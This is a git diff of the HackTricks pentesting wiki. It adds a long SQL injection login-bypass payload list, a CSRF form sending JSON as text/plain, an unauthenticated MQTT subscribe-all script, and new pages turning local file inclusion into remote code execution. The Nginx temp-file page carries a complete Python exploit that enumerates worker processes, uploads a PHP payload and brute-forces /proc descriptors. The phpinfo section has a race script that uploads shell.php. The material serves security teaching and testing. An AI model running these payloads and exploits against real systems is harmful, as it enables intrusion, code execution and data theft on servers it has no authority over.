+" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 3985ec2bd..6bbd119fe 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -10,7 +10,7 @@ dht udp "DHT Nodes" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>) InfluxDB diff --git a/SUMMARY.md b/SUMMARY.md index c7c772cb7..b8e2da024 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -406,6 +406,8 @@ * [Email Injections](pentesting-web/email-header-injection.md) * [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md) * [phar:// deserialization](pentesting-web/file-inclusion/phar-deserialization.md) + * [LFI2RCE via phpinfo()](pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md) + * [LFI2RCE via Nginx temp files](pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md) * [File Upload](pentesting-web/file-upload/README.md) * [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md) * [Formula Injection](pentesting-web/formula-injection.md) diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index d8d0be4aa..521b1c83c 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -387,7 +387,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`** Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (621) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (620).png>) Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index f2fcdefdb..d40ef5996 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (2).png>) An then use the following code diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 347fc1ecd..0c07eb93c 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png>) ### USB Detective diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md index 0e9efc37a..2f49900cc 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>) ### Step 6: Profile Installation diff --git a/mobile-apps-pentesting/ios-pentesting/README.md b/mobile-apps-pentesting/ios-pentesting/README.md index 1be5ecde8..f43cc47ca 100644 --- a/mobile-apps-pentesting/ios-pentesting/README.md +++ b/mobile-apps-pentesting/ios-pentesting/README.md @@ -3,14 +3,13 @@ {% hint style="warning" %} **Support HackTricks and get benefits!** -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? -Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -524,8 +523,8 @@ Check for possible couchbase databases in `/private/var/mobile/Containers/Data/A iOS store the cookies of the apps in the **`Library/Cookies/cookies.binarycookies`** inside each apps folder. However, developers sometimes decide to save them in the **keychain** as the mentioned **cookie file can be accessed in backups**. -To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) or use** objection's **`ios cookies get`.**\ -**You can also use objection to** convert these files to a JSON** format and inspect the data. +To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) or use\*\* objection's **`ios cookies get`.**\ +**You can also use objection to** convert these files to a JSON\*\* format and inspect the data. ```bash ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json @@ -615,7 +614,7 @@ You can also use `ios keychain dump` from [**Objection**](https://github.com/sen #### **NSURLCredential** **NSURLCredential** is the perfect class to **store username and password in the keychain**. No need to bother with NSUserDefaults nor any keychain wrapper.\ -Once the user is logged in, you can** store** his username and password to the keychain: +Once the user is logged in, you can\*\* store\*\* his username and password to the keychain: ```swift NSURLCredential *credential; @@ -712,7 +711,7 @@ You can collect console logs through the Xcode **Devices** window as follows: 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. -![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (5).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: @@ -850,7 +849,7 @@ For **more information** about iOS cryptographic APIs and libraries access [http The tester should be aware that **local authentication should always be enforced at a remote endpoint** or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process. -The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) \_**\_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication. +The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) \_\*\*\_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication. The **fingerprint ID** sensor is operated by the [SecureEnclave security coprocessor](https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf) and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced _Face ID_: which allows authentication based on facial recognition. @@ -1094,7 +1093,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y ### Certificate Pinning If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ -In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) or install \[**Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)**\* +In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) or install \[**Burp Mobile Assistant\_\*]\(\_**[**https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\* You can also use **objection's** `ios sslpinning disable` diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index 739aab8c9..afbb5eae3 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -100,6 +100,21 @@ According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#s However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._ +Example (from [here](https://brycec.me/posts/corctf\_2021\_challenges)) of sending JSON data as text/plain: + +```html + + +
+ +
+ + + +``` + ### application/json preflight request bypass As you already know, you cannot sent a POST request with the Content-Type **`application/json`** via HTML form, and if you try to do so via **`XMLHttpRequest`** a **preflight** request is sent first.\ diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index e3f70a9c7..54651e2c2 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md @@ -3,14 +3,13 @@ {% hint style="warning" %} **Support HackTricks and get benefits!** -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? -Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -413,61 +412,21 @@ If ssh is active check which user is being used (/proc/self/status & /etc/passwd The logs of this FTP server are stored in _**/var/log/vsftpd.log.**_ If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI. +### Via Nginx temp file storage + +If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique: + +{% content-ref url="lfi2rce-via-nginx-temp-files.md" %} +[lfi2rce-via-nginx-temp-files.md](lfi2rce-via-nginx-temp-files.md) +{% endcontent-ref %} + ### Via phpinfo() (file\_uploads = on) -To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo() is displayed, "file\_uploads = on" and the server has to be able to write in the "/tmp" directory.** +If you found a **Local File Inclusion** and a file exposing **phpinfo()** with file\_uploads = on you can get RCE: -[https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py) - -**Tutorial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s) - -You need to fix the exploit (change **=>** for **=>**). To do so you can do: - -``` -sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\>/g' phpinfolfi.py -``` - -You have to change also the **payload** at the beginning of the exploit (for a php-rev-shell for example), the **REQ1** (this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), and **LFIREQ** (this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char) - -{% file src="../../.gitbook/assets/LFI-With-PHPInfo-Assistance.pdf" %} - -#### Theory - -If uploads are allowed in PHP and you try to upload a file, this files is stored in a temporal directory until the server has finished processing the request, then this temporary files is deleted. - -Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted. - -In **Windows** the files are usually stored in **C:\Windows\temp\php<<** - -In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig()**". - -**phpinfo()** - -**PHP** uses a buffer of **4096B** and when it is **full**, it is **send to the client**. Then the client can **send** **a lot of big requests** (using big headers) **uploading a php** reverse **shell**, wait for the **first part of the phpinfo() to be returned** (where the name of the temporary file is) and try to **access the temp file** before the php server deletes the file exploiting a LFI vulnerability. - -**Python script to try to bruteforce the name (if length = 6)** - -```python -import itertools -import requests -import sys - -print('[+] Trying to win the race') -f = {'file': open('shell.php', 'rb')} -for _ in range(4096 * 4096): - requests.post('http://target.com/index.php?c=index.php', f) - - -print('[+] Bruteforcing the inclusion') -for fname in itertools.combinations(string.ascii_letters + string.digits, 6): - url = 'http://target.com/index.php?c=/tmp/php' + fname - r = requests.get(url) - if 'load average' in r.text: # /dev/pts/0 +lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 +lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd] +lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587] +lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589] +lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926] +lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927] +lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) +... +``` + +Note: One cannot directly include `/proc/34/fd/15` in this example as PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: `/proc/self/fd/34/../../../34/fd/15` which will finally execute the content of the deleted `/var/lib/nginx/body/0000001368` file. + +## Full Exploit + +```python +#!/usr/bin/env python3 +import sys, threading, requests + +# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance +# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details + +URL = f'http://{sys.argv[1]}:{sys.argv[2]}/' + +# find nginx worker processes +r = requests.get(URL, params={ + 'file': '/proc/cpuinfo' +}) +cpus = r.text.count('processor') + +r = requests.get(URL, params={ + 'file': '/proc/sys/kernel/pid_max' +}) +pid_max = int(r.text) +print(f'[*] cpus: {cpus}; pid_max: {pid_max}') + +nginx_workers = [] +for pid in range(pid_max): + r = requests.get(URL, params={ + 'file': f'/proc/{pid}/cmdline' + }) + + if b'nginx: worker process' in r.content: + print(f'[*] nginx worker found: {pid}') + + nginx_workers.append(pid) + if len(nginx_workers) >= cpus: + break + +done = False + +# upload a big client body to force nginx to create a /var/lib/nginx/body/$X +def uploader(): + print('[+] starting uploader') + while not done: + requests.get(URL, data='** for **=>**). To do so you can do: + +``` +sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\>/g' phpinfolfi.py +``` + +You have to change also the **payload** at the beginning of the exploit (for a php-rev-shell for example), the **REQ1** (this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), and **LFIREQ** (this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char) + +{% file src="../../.gitbook/assets/LFI-With-PHPInfo-Assistance.pdf" %} + +#### Theory + +If uploads are allowed in PHP and you try to upload a file, this files is stored in a temporal directory until the server has finished processing the request, then this temporary files is deleted. + +Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted. + +In **Windows** the files are usually stored in **C:\Windows\temp\php<<** + +In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig()**". + +**phpinfo()** + +**PHP** uses a buffer of **4096B** and when it is **full**, it is **send to the client**. Then the client can **send** **a lot of big requests** (using big headers) **uploading a php** reverse **shell**, wait for the **first part of the phpinfo() to be returned** (where the name of the temporary file is) and try to **access the temp file** before the php server deletes the file exploiting a LFI vulnerability. + +**Python script to try to bruteforce the name (if length = 6)** + +```python +import itertools +import requests +import sys + +print('[+] Trying to win the race') +f = {'file': open('shell.php', 'rb')} +for _ in range(4096 * 4096): + requests.post('http://target.com/index.php?c=index.php', f) + + +print('[+] Bruteforcing the inclusion') +for fname in itertools.combinations(string.ascii_letters + string.digits, 6): + url = 'http://target.com/index.php?c=/tmp/php' + fname + r = requests.get(url) + if 'load average' in r.text: # ) +![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>) ### More diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md index 0ff356b28..e0c728aaf 100644 --- a/pentesting-web/saml-attacks/README.md +++ b/pentesting-web/saml-attacks/README.md @@ -8,7 +8,7 @@ ## Attacks Graphic -![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (3).png>) +![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (3).png>) ## Tool diff --git a/pentesting/1883-pentesting-mqtt-mosquitto.md b/pentesting/1883-pentesting-mqtt-mosquitto.md new file mode 100644 index 000000000..de11bcfe1 --- /dev/null +++ b/pentesting/1883-pentesting-mqtt-mosquitto.md @@ -0,0 +1,101 @@ +# 1883 - Pentesting MQTT (Mosquitto) + +## Basic Information + +MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium. + +**Default port:** 1883 + +``` +PORT STATE SERVICE REASON +1883/tcp open mosquitto version 1.4.8 syn-ack +``` + +## Inspecting the traffic + +MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:** + +![](<../.gitbook/assets/image (645) (1).png>) + +### [**Brute-Force MQTT**](../brute-force.md#mqtt) + +## Pentesting MQTT + +**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords. + +To connect to a MQTT service you can use: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) and subscribe yourself to all the topics doing: + +``` +> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883) +> subscribe "#" 1 +> subscribe "$SYS/#" +``` + +You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn) + +You can also use: + +```bash +apt-get install mosquitto mosquitto-clients +mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic' +``` + +Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**: + +```python +#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py +import paho.mqtt.client as mqtt +import time +import os + +HOST = "127.0.0.1" +PORT = 1883 + +def on_connect(client, userdata, flags, rc): + client.subscribe('#', qos=1) + client.subscribe('$SYS/#') + +def on_message(client, userdata, message): + print('Topic: %s | QOS: %s | Message: %s' % (message.topic, message.qos, message.payload)) + +def main(): + client = mqtt.Client() + client.on_connect = on_connect + client.on_message = on_message + client.connect(HOST, PORT) + client.loop_start() + #time.sleep(10) + #client.loop_stop() + +if __name__ == "__main__": + main() +``` + +## More information + +from here: 